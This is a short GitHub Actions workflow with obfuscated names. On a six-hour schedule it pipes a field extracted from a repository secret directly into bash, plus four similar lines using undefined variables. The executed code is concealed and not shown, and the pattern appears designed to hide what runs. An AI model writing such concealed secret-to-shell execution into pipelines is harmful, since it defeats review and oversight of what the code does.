name: shenerwei7651

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shenerwei7651
        env:
          msill07: ${{ secrets.msill07 }}
        run: |
          echo $msill07 | jq -r .pds0661 | /bin/bash
          echo $izb05134 | jq -r .hjbnl45190 | /bin/bash
          echo $k9 | jq -r .e6 | /bin/bash
          echo $zlb5 | jq -r .sncde467 | /bin/bash
          echo $sw7659 | jq -r .yik903 | /bin/bash

